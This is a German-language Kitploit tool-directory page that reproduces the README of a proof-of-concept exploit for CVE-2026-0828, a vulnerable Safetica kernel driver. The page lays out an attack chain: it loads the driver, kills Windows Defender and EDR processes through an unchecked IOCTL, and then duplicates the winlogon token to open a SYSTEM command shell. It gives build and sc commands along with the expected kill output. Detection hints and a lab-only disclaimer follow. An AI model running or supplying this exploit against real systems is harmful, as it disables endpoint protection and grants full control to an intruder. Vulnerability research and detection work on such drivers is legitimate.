Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2026-0828 — Proof-of-Concept-Exploit für CVE-2026-0828, eine BYOVD-Sicherheitslücke in Safetica ProcessMonitorDriver.sys, die es unprivilegierten Benutzern ermöglicht, PPL-geschützte Prozesse zu beenden und eine lokale Rechteausweitung auf SYSTEM durch Missbrauch von IOCTLs und Token-Duplikation zu erreichen. | Kitploit
Tools/GitHubGitHub/mein-0/cve-2026-0828
Privilege EscalationSchwachstellenanalyseExploitationIDS/IPS-UmgehungLaterale BewegungPost-ExploitationRed TeamingPayload-EntwicklungBinary-Exploitation
GitHubmein-0/cve-2026-0828

cve-2026-0828

Repository anzeigen
13vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →

Über

Proof-of-Concept-Exploit für CVE-2026-0828, eine BYOVD-Sicherheitslücke in Safetica ProcessMonitorDriver.sys, die es unprivilegierten Benutzern ermöglicht, PPL-geschützte Prozesse zu beenden und eine lokale Rechteausweitung auf SYSTEM durch Missbrauch von IOCTLs und Token-Duplikation zu erreichen.

Teilen

CVE-2026-0828 — Safetica ProcessMonitorDriver.sys BYOVD PoC

Safetica DLP Kernel-Treiber (ProcessMonitorDriver.sys) legt eine nicht authentifizierte IOCTL frei, die es jedem Benutzermodus-Aufrufer ermöglicht, beliebige Prozesse über ZwTerminateProcess im Kernel-Kontext zu beenden und dabei den PPL-Schutz (Protected Process Light) zu umgehen.

CVSS: 8.8 (Hoch) · Typ: BYOVD, LPE · Plattform: Windows x64


Schwachstelle

Der IRP_MJ_DEVICE_CONTROL-Handler für IOCTL 0xB822200C ruft ZwOpenProcess mit PROCESS_ALL_ACCESS (0x1FFFFF) und anschließend ZwTerminateProcess auf, wobei eine PID verwendet wird, die direkt aus dem Eingabepuffer stammt – ohne jegliche Privileg- oder Aufruferüberprüfung.

root@kitploit:~
// Vulnerable handler (IDA pseudocode)
ClientId.UniqueProcess = **(HANDLE **)(irp->AssociatedIrp.SystemBuffer);

ZwOpenProcess(&ProcessHandle, 0x1FFFFFu, &ObjectAttributes, &ClientId);
ZwTerminateProcess(ProcessHandle, 0);  // no SeSinglePrivilegeCheck, no ExGetPreviousMode check

Da der Aufruf im Kernel-Kontext erfolgt, können PPL-geschützte Prozesse (Windows Defender, EDR-Agenten) beendet werden.

Betroffene Versionen: Safetica < 11.26.19 / < 10.5.150
Behoben in: Safetica 11.26.19, 11.29.8, 10.5.150 – Privilegprüfung zum IOCTL-Handler hinzugefügt
Referenzen: KOSEC Advisory · CERT VU#818729


Angriffskette

root@kitploit:~
Admin privileges
    │
    ├─► Load ProcessMonitorDriver.sys
    │       sc create STProcessMonitor type=kernel binPath=...
    │
    ├─► PHASE 1: Kill EDR via IOCTL 0xB822200C
    │       DeviceIoControl(\\.\STProcessMonitorDriver, 0xB822200C, &pid, 8, ...)
    │       → ZwTerminateProcess(Defender/EDR, 0)  [kernel ctx, PPL bypassed]
    │
    └─► PHASE 2: Token duplication → SYSTEM shell
            AdjustTokenPrivileges(SeDebugPrivilege)
            OpenProcess(winlogon.exe)
            DuplicateTokenEx(TokenPrimary)
            CreateProcessWithTokenW(cmd.exe)
            → NT AUTHORITY\SYSTEM

Dateien

DateiBeschreibung
exploit.cVollständiger PoC – beendet EDR, startet NT AUTHORITY\SYSTEM cmd.exe

Build

Erfordert Visual Studio (x64 Native Tools Command Prompt):

root@kitploit:~
cl.exe /W3 /O1 /nologo exploit.c /Fe:exploit.exe

Verwendung

Schritt 1 – Treiber laden (Administrator-CMD):

root@kitploit:~
sc create STProcessMonitor type= kernel binPath= "C:\path\to\ProcessMonitorDriver.sys"
sc start STProcessMonitor

Schritt 2 – PoC ausführen:

root@kitploit:~
exploit.exe

Erwartete Ausgabe:

root@kitploit:~
[Phase 1] Killing EDR via CVE-2026-0828...
  MsMpEng.exe       PID 3412  -> KILLED
  NisSrv.exe        PID 4180  -> KILLED

SeDebugPrivilege enabled
winlogon.exe -> pid 560
[+] Got SYSTEM token handle.
[+] Token duplicated.
shell spawned

Ein neues cmd.exe-Fenster öffnet sich als NT AUTHORITY\SYSTEM.


Erkennung

Ereignis-ID 7045 – neue Kernel-Dienstinstallation:

root@kitploit:~
Service Name:      STProcessMonitor
Service File Name: ...\ProcessMonitorDriver.sys
Service Type:      kernel mode driver

WDAC-Blockliste (SHA256):

root@kitploit:~
70bcec00c215fe52779700f74e9bd669ff836f594df92381cbfb7ee0568e7a8b

ETW: Überwachen Sie DeviceIoControl-Aufrufe an \\.\STProcessMonitorDriver.


Getestet auf

  • Windows 10 22H2 x64

Nur für autorisierte Sicherheitsforschung und Labornutzung. Nicht gegen Systeme verwenden, die Ihnen nicht gehören oder für die Sie keine schriftliche Erlaubnis zum Testen haben.

Tool herunterladen